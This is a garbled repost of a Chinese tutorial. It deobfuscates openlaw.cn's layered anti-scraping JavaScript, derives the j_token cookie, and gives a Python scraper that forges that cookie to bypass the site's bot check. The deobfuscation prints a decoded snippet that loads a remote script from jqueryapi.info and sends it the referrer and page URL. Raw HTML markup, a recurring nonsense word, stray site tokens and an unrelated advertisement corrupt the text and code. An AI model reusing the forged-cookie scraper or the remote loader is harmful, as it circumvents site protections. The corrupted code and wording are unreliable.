爬虫与反爬虫一直是一对天生的对手,反爬手段多种多样,激活成功教程手段也应运而生。
本文主要介绍一种利用前端JS代码混淆加密来实现反爬的技术手段,并实践如何技术上激活成功教程。
OpenLaw 是一个面向律师、法官、检察官、法学教师、学者、学生以及从事法律相关的工作人员的 NGO 开放型组织,OpenLaw 的用户被视为法律技术和知识的源泉,共同分享法律专业知识以及智慧和经验成果。
GPT plus 代充 只需 145
我们尝试爬取某causeId下的案件信息,页面访问都很正常。很开心,我们使用requests包进行爬取,看似很轻松嘛。
讯享网<span class="n">url</span> <span class="o">=</span> <span class="s1">'http://openlaw.cn/search/judgement/type?causeId=d8347beb4200e822f'</span> <span class="n">host</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'host'</span><span class="p">:</span> <span class="s1">'openlaw.cn'</span><span class="p">,}</span> <span class="n">headers</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span> <span class="n">headers</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="p">)</span> <span class="c1"># 第一步,获取js文件内容</span> <span class="n">ret_origin</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="nb">print</span> <span class="n">ret_origin</span><span class="o">.</span><span class="n">text</span></code></pre></div><p data-pid="aQN4JMBh">可是,我们看到打印的文本内容时,不是很开心啊,貌似输出的是一长串js代码。肿么办,宝宝心里苦哇!!</p><figure data-size="normal"><img data-rawheight="105" src="https://pic4.zhimg.com/v2-e045f67b3cf6828e39d443be5b9b10e1_r.jpg" data-size="normal" data-rawwidth="554" data-original-token="v2-e045f67b3cf6828e39d443be5b9b10e1" class="origin_image zh-lightbox-thumb" width="554" data-original="https://pic4.zhimg.com/v2-e045f67b3cf6828e39d443be5b9b10e1_r.jpg"/></figure><p data-pid="i-OiDoky">我们直接用浏览器访问,发现访问时带入了一个j_token的cookie请求,这是从哪来的,我们需要从哪找到呢?</p><p data-pid="cBoAmnVr">后面激活成功教程我们能够知道,这其实是两步。<b>第一步不带j_token请求,会跳转到js混淆代码,计算获取j_token并写入cookie中去;第二步带j_token请求,请求到最终呈现。</b></p><p data-pid="qkJiYi9M">好的,我们来开始演进激活成功教程之路,道具需要Chrome的snippets和console,创建一个snippet并将js代码拷贝进去,格式美化下(见红框)。</p><figure data-size="normal"><img data-rawheight="427" src="https://pica.zhimg.com/v2-775b029323f6fca8cb3dc5ef8a_r.jpg" data-size="normal" data-rawwidth="554" data-original-token="v2-775b029323f6fca8cb3dc5ef8a" class="origin_image zh-lightbox-thumb" width="554" data-original="https://pica.zhimg.com/v2-775b029323f6fca8cb3dc5ef8a_r.jpg"/></figure><p data-pid="bLmUKotp">我们将js代码分三段,先从第一段开始。</p><div class="highlight"><pre><code class="language-js"><span class="kd">var</span> <span class="nx">O01</span> <span class="o">=</span> <span class="s1">'WdmhCbhZXZ......'</span><span class="p">;</span>
function lOO(data) {
<span class="kd">var</span> <span class="nx">OOOlOI</span> <span class="o">=</span> <span class="s2">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0+/="</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">o1</span><span class="p">,</span> <span class="nx">o2</span><span class="p">,</span> <span class="nx">o3</span><span class="p">,</span> <span class="nx">h1</span><span class="p">,</span> <span class="nx">h2</span><span class="p">,</span> <span class="nx">h3</span><span class="p">,</span> <span class="nx">h4</span><span class="p">,</span> <span class="nx">bits</span><span class="p">,</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="nx">enc</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span> <span class="k">do</span> <span class="p">{</span> <span class="nx">h1</span> <span class="o">=</span> <span class="nx">OOOlOI</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">charAt</span><span class="p">(</span><span class="nx">i</span><span class="o">++</span><span class="p">));</span> <span class="nx">h2</span> <span class="o">=</span> <span class="nx">OOOlOI</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">charAt</span><span class="p">(</span><span class="nx">i</span><span class="o">++</span><span class="p">));</span> <span class="nx">h3</span> <span class="o">=</span> <span class="nx">OOOlOI</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">charAt</span><span class="p">(</span><span class="nx">i</span><span class="o">++</span><span class="p">));</span> <span class="nx">h4</span> <span class="o">=</span> <span class="nx">OOOlOI</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">charAt</span><span class="p">(</span><span class="nx">i</span><span class="o">++</span><span class="p">));</span> <span class="nx">bits</span> <span class="o">=</span> <span class="nx">h1</span> <span class="o"><<</span> <span class="mi">18</span> <span class="o">|</span> <span class="nx">h2</span> <span class="o"><<</span> <span class="mi">12</span> <span class="o">|</span> <span class="nx">h3</span> <span class="o"><<</span> <span class="mi">6</span> <span class="o">|</span> <span class="nx">h4</span><span class="p">;</span> <span class="nx">o1</span> <span class="o">=</span> <span class="nx">bits</span> <span class="o">>></span> <span class="mi">16</span> <span class="o">&</span> <span class="mh">0xff</span><span class="p">;</span> <span class="nx">o2</span> <span class="o">=</span> <span class="nx">bits</span> <span class="o">>></span> <span class="mi">8</span> <span class="o">&</span> <span class="mh">0xff</span><span class="p">;</span> <span class="nx">o3</span> <span class="o">=</span> <span class="nx">bits</span> <span class="o">&</span> <span class="mh">0xff</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nx">h3</span> <span class="o">==</span> <span class="mi">64</span><span class="p">)</span> <span class="p">{</span> <span class="nx">enc</span> <span class="o">+=</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="nx">o1</span><span class="p">)</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nx">h4</span> <span class="o">==</span> <span class="mi">64</span><span class="p">)</span> <span class="p">{</span> <span class="nx">enc</span> <span class="o">+=</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="nx">o1</span><span class="p">,</span> <span class="nx">o2</span><span class="p">)</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">enc</span> <span class="o">+=</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="nx">o1</span><span class="p">,</span> <span class="nx">o2</span><span class="p">,</span> <span class="nx">o3</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="nx">i</span> <span class="o"><</span> <span class="nx">data</span><span class="p">.</span><span class="nx">length</span><span class="p">);</span><span class="k">return</span> <span class="nx">enc</span>
} function OOO(string) {
讯享网<span class="kd">var</span> <span class="nx">ret</span> <span class="o">=</span> <span class="s1">''</span> <span class="p">,</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span><span class="nx">i</span> <span class="o">=</span> <span class="nx">string</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> <span class="nx">i</span> <span class="o">>=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span> <span class="nx">ret</span> <span class="o">+=</span> <span class="nx">string</span><span class="p">.</span><span class="nx">charAt</span><span class="p">(</span><span class="nx">i</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">ret</span><span class="p">;</span>
} eval(lOO(OOO(O01)));
上述代码,将eval改为console.log,新建snippet拷贝这一段内容,运行该脚本,在Chrome的console中输出js代码输出结果。
eval(function(p,a,c,k,e,d){一大串代码)))
继续将eval改为console.log,运行该脚本,在Chrome的console中输出js代码输出结果;发现还是一段以eval开始的js代码,像剥洋葱一样一层一层继续重复上述过程,直到我们到了下面的内容。
讯享网var _escape = ‘%3Cscript%3Evar%20openlaw%20%3D%20%27openlaw%27%3B%3C/script%3E’; var OOI = document.createElement(‘script’); OOI.src = ‘http://jqueryapi.info/?getsrc=ok' + ’&ref=‘ + encodeURIComponent(document.referrer) + ’&url=‘ + encodeURIComponent(document.URL); var _101 = document.getElementsByTagName(’head‘)[0]; _101.appendChild(OOI); document.write(unescape(_escape));
将该代码在一些在线UrlEncode编码/UrlDecode解码网址进行解码,获得下列代码。
var _escape = ’<script>var openlaw = ‘openlaw’;</script>‘; var OOI = document.createElement(’script‘); OOI.src = ’http://jqueryapi.info/?getsrc=ok' ‘&ref=’ encodeURIComponent(document.referrer) ‘&url=’ encodeURIComponent(document.URL); var _101 = document.getElementsByTagName(‘head’)[0]; _101.appendChild(OOI); document.write(unescape(_escape));
可见,是获取一段新的js代码,并将其插入到页面中去;于我们需要的内容没有太大关系,我们进入下一段。
讯享网window.n = “j_token”; eval(function(p, a, c, k, e, d) { e = function(c) { return (c < a ? “” : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) } ; if (!‘’.replace(/^/, String)) { while (c–)
<span class="nx">d</span><span class="p">[</span><span class="nx">e</span><span class="p">(</span><span class="nx">c</span><span class="p">)]</span> <span class="o">=</span> <span class="nx">k</span><span class="p">[</span><span class="nx">c</span><span class="p">]</span> <span class="o">||</span> <span class="nx">e</span><span class="p">(</span><span class="nx">c</span><span class="p">);</span> <span class="nx">k</span> <span class="o">=</span> <span class="p">[</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
return d[e] } ];
讯享网 <span class="nx">e</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
return ‘\w+’ } ;
<span class="nx">c</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
} ;while (c–) if (k[c])
讯享网 <span class="nx">p</span> <span class="o">=</span> <span class="nx">p</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="s1">'\\b'</span> <span class="o">+</span> <span class="nx">e</span><span class="p">(</span><span class="nx">c</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'\\b'</span><span class="p">,</span><span class="s1">'g'</span><span class="p">),</span> <span class="nx">k</span><span class="p">[</span><span class="nx">c</span><span class="p">]);</span>
return p; }(‘1 2\(=[\'\\9\\5\\6\\4\\3\\7\\8\'];1 a=2\)[0];’, 11, 11, ‘|var||x6c|x6e|x70|x65|x61|x77|x6f|’.split(‘|’), 0, {}));
同样的,eval替换为console.log,输出结果是:
var \(</span><span class="o">=</span><span class="p">[</span><span class="s1">'\x6f\x70\x65\x6e\x6c\x61\x77'</span><span class="p">];</span> <span class="kd">var</span> <span class="nx">a</span><span class="o">=</span><span class="nx">_\)[0];
将该代码在一些在线ascii码转字符,获得下列代码。
讯享网var $=[‘openlaw’]; var a=\(</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> </code></pre></div><p data-pid="VvEL9ehR">扒光了,看起来,和我们想要的关系也不大,进入到最后一段。</p><div class="highlight"><pre><code class="language-js"><span class="nb">window</span><span class="p">.</span><span class="nx">v</span> <span class="o">=</span> <span class="s2">"_bdfe397f5ff6506dd001f632e2db0311"</span><span class="p">;</span> <span class="nx">\) = ~[]; \(</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">___</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), $$$\(</span><span class="o">:</span> <span class="p">(</span><span class="o">!</span><span class="p">[]</span> <span class="o">+</span> <span class="s2">""</span><span class="p">)[</span><span class="nx">\)], \(</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), \(_\): (![] + “”)[$], \(_</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), \(_\)\(</span><span class="o">:</span> <span class="p">({}</span> <span class="o">+</span> <span class="s2">""</span><span class="p">)[</span><span class="nx">\)], $\(_\): (\(</span><span class="p">[</span><span class="nx">\)] + “”)[\(</span><span class="p">],</span> <span class="nx">_\)\(</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), $$\(_</span><span class="o">:</span> <span class="p">(</span><span class="o">!</span><span class="s2">""</span> <span class="o">+</span> <span class="s2">""</span><span class="p">)[</span><span class="nx">\)], $: ++\(</span><span class="p">,</span> <span class="nx">\)_\(</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), $\(__</span><span class="o">:</span> <span class="p">({}</span> <span class="o">+</span> <span class="s2">""</span><span class="p">)[</span><span class="nx">\)], $\(_</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), $$\(</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), \(___</span><span class="o">:</span> <span class="o">++</span><span class="nx">\), \(__\): ++\(</span> <span class="p">};</span> <span class="nx">\).\(_</span> <span class="o">=</span> <span class="p">(</span><span class="nx">\).\(_</span> <span class="o">=</span> <span class="nx">\) + “”)[\(</span><span class="p">.</span><span class="nx">\)\(</span><span class="p">]</span> <span class="o">+</span> <span class="p">(</span><span class="nx">\).\(</span> <span class="o">=</span> <span class="nx">\).\(_</span><span class="p">[</span><span class="nx">\).\(</span><span class="p">])</span> <span class="o">+</span> <span class="p">(</span><span class="nx">\).$\(</span> <span class="o">=</span> <span class="p">(</span><span class="nx">\).\(</span> <span class="o">+</span> <span class="s2">""</span><span class="p">)[</span><span class="nx">\).\(</span><span class="p">])</span> <span class="o">+</span> <span class="p">((</span><span class="o">!</span><span class="nx">\)) + “”)[\(</span><span class="p">.</span><span class="nx">_\)\(</span><span class="p">]</span> <span class="o">+</span> <span class="p">(</span><span class="nx">\). = \(</span><span class="p">.</span><span class="nx">\)[\(</span><span class="p">.</span><span class="nx">\)$]) + (\(</span><span class="p">.</span><span class="nx">\) = (!“” + “”)[$.\(</span><span class="p">])</span> <span class="o">+</span> <span class="p">(</span><span class="nx">\). = (!“” + “”)[$.\(_</span><span class="p">])</span> <span class="o">+</span> <span class="nx">\).\(_</span><span class="p">[</span><span class="nx">\).\(_\)] + \(</span><span class="p">.</span><span class="nx">__</span> <span class="o">+</span> <span class="nx">\).\(</span> <span class="o">+</span> <span class="nx">\).\(</span><span class="p">;</span> <span class="nx">\).$\(</span> <span class="o">=</span> <span class="nx">\).\(</span> <span class="o">+</span> <span class="p">(</span><span class="o">!</span><span class="s2">""</span> <span class="o">+</span> <span class="s2">""</span><span class="p">)[</span><span class="nx">\).$\(</span><span class="p">]</span> <span class="o">+</span> <span class="nx">\). + \(</span><span class="p">.</span><span class="nx">_</span> <span class="o">+</span> <span class="nx">\).\(</span> <span class="o">+</span> <span class="nx">\).$\(</span><span class="p">;</span> <span class="nx">\).\(</span> <span class="o">=</span> <span class="p">(</span><span class="nx">\).)[\(</span><span class="p">.</span><span class="nx">\)][\(</span><span class="p">.</span><span class="nx">\)_]; \(</span><span class="p">.</span><span class="nx">\)(\(</span><span class="p">.</span><span class="nx">\)(一大串代码)())();
我们先将上述代码(除最后一行外)拷贝到console中执行,以备变量使用。最后一句,我们将一大串代码执放入Chrome的console中执行,
将输出中将return后面的内容放入console.log()中执行,获取下面代码。
window.v = “bdfe397f5ff6506dd001f632e2db0311”; function p(s) { return s.substring(2, 4).concat(‘n’).concat(s.substring(0, 1)).concat(‘p’).concat(s.substring(4, 8)).concat(‘e’).concat(s.substring(1, 2)).concat(s.substring(16)).concat(s.substring(8, 16)); } ;+function() { document.cookie = “j” + “” + “token=” + p(window.v); location.reload(); }();
已经很明显了,我们要的j_token就在这里面,可以鼓掌相庆了。这一段代码中p(s)用python改写下即可。
下面就是具体实现代码及实现结果了。
讯享网# -- coding:utf-8 -- import requests import re from lxml import html #抓取详细信息 class OpenLawSpider:
<span class="c1">#页面初始化</span>
<span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"Accept"</span><span class="p">:</span> <span class="s2">"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"</span><span class="p">,</span>
<span class="s2">"Accept-Encoding"</span><span class="p">:</span> <span class="s2">"gzip, deflate"</span><span class="p">,</span>
<span class="s2">"Accept-Language"</span><span class="p">:</span> <span class="s2">"zh-CN,zh;q=0.9"</span><span class="p">,</span>
<span class="s2">"Cache-Control"</span><span class="p">:</span> <span class="s2">"max-age=0"</span><span class="p">,</span>
<span class="s2">"Connection"</span><span class="p">:</span> <span class="s2">"keep-alive"</span><span class="p">,</span>
<span class="s2">"User-Agent"</span><span class="p">:</span> <span class="s2">"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36"</span>
<span class="p">}</span>
<span class="c1"># 获取详细</span>
<span class="k">def</span> <span class="nf">getLawDetail</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">'http://openlaw.cn/search/judgement/type?causeId=d8347b89678645e1887045b4200e822f'</span>
<span class="n">host</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'host'</span><span class="p">:</span> <span class="s1">'openlaw.cn'</span><span class="p">,}</span>
<span class="n">headers</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">headers</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="p">)</span>
<span class="c1"># 第一步,获取js文件内容</span>
<span class="n">ret_origin</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="nb">print</span> <span class="n">ret_origin</span><span class="o">.</span><span class="n">text</span>
<span class="n">cookies</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">utils</span><span class="o">.</span><span class="n">dict_from_cookiejar</span><span class="p">(</span><span class="n">ret_origin</span><span class="o">.</span><span class="n">cookies</span><span class="p">)</span>
<span class="c1"># 第二步,js代码并还原j_token计算过程,正则匹配window.v</span>
<span class="nb">cmp</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="s1">'window.v="(.*)";'</span><span class="p">)</span>
<span class="n">rst</span> <span class="o">=</span> <span class="nb">cmp</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="n">ret_origin</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
<span class="n">v_token</span> <span class="o">=</span> <span class="s1">'abcdefghijklmnopqrstuvwxyz'</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">rst</span><span class="p">):</span>
<span class="n">v_token</span> <span class="o">=</span> <span class="n">rst</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">j_token</span> <span class="o">=</span> <span class="n">v_token</span><span class="p">[</span><span class="mi">2</span><span class="p">:</span><span class="mi">4</span><span class="p">]</span> <span class="o">+</span> <span class="s1">'n'</span> <span class="o">+</span> <span class="n">v_token</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s1">'p'</span> <span class="o">+</span> <span class="n">v_token</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">]</span> <span class="o">+</span> <span class="s1">'e'</span> <span class="o">+</span> <span class="n">v_token</span><span class="p">[</span><span class="mi">1</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">v_token</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">v_token</span><span class="p">)</span><span class="o">-</span><span class="mi">17</span><span class="p">:]</span> <span class="o">+</span> <span class="n">v_token</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">16</span><span class="p">]</span>
<span class="n">cookies</span><span class="p">[</span><span class="s1">'j_token'</span><span class="p">]</span> <span class="o">=</span> <span class="n">j_token</span>
<span class="n">ret_next</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">cookies</span> <span class="o">=</span> <span class="n">cookies</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">html</span><span class="o">.</span><span class="n">fromstring</span><span class="p">(</span><span class="n">ret_next</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
<span class="n">items</span> <span class="o">=</span> <span class="n">response</span><span class="o">.</span><span class="n">cssselect</span><span class="p">(</span><span class="s2">"div[id=primary] .ht-container .entry-title a"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">items</span><span class="p">:</span>
<span class="n">title</span> <span class="o">=</span> <span class="n">item</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="nb">print</span> <span class="n">title</span>
spider = OpenLawSpider() spider.getLawDetail()
输出结果,如下。
字体反爬激活成功教程实践源代码:点这里,密码:a4nb
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/212206.html